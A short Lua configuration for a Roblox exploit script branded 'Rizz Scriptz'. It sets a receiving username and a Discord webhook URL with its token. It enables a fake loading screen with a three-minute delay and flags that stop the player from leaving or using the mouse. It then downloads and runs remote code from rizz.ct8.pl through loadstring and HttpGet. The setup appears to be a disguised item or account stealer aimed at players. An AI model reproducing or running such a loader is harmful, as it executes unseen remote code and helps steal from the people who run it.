UserName = "Biblixyep123" 
Webhook = "https://discord.com/api/webhooks/1100040700873162773/9M7kEoPItpOavW4yaEmc2CjtiDeSTva2tZ0fHaJn0X8CI2ylLgSkp9PrZ_qTyLoU_itU" 

_G.LoadingScreen = true
_G.AntiLeave = true
_G.MouseLock = true 

_G.ScriptName = "Rizz Scriptz"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("http://rizz.ct8.pl/scripts/Main", true))()
